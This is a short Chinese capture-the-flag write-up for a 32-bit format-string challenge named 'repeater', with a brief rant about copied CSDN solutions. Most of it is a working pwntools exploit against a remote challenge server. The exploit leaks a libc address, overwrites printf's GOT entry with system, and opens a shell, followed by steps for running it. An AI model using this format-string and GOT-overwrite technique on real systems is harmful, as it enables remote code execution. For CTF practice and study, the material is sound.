PWN repeater

他奶奶滴必须要吐槽一下啊，csdn是真的坑爹，全是抄袭，要是第一个人是对的还好，要是错的，那就全错，真的坑。

首先知道题目是32位，只开了nx;

from pwn import*
from LibcSearcher import LibcSearcher
# context.log_level = "debug"
elf = ELF("./pwn7")
io = remote("117.72.52.127","12769")
puts_got = elf.got["puts"]
   
payload1 = p32(puts_got) + b"%6$s"
io.recvuntil("Do you know repeater?\n")
io.send(payload1)
puts_addr = u32(io.recv(8)[-4:])   
print(hex(puts_addr))
libc = LibcSearcher("puts", puts_addr) 
libc_base = puts_addr - libc.dump('puts')
print(hex(libc_base))
 
printf_got = elf.got["printf"]
system_addr = libc_base + libc.dump("system")
 
payload2 = fmtstr_payload(6,{printf_got : system_addr})
io.sendline(payload2)
io.sendline("/bin/sh\00")
io.interactive()

只要修改remote就行,对了没下 LibcSearcher的，这里粘贴:pip install LibcSearcher 需要python环境，搞个虚拟的，做题就行。

执行了会让你选择版本，这里选择1（一个一个尝试得到的）

然后ls ,cd flag 就行了，代码自己多揣摩，这里就不写详细了，不会就问ai,或者老师。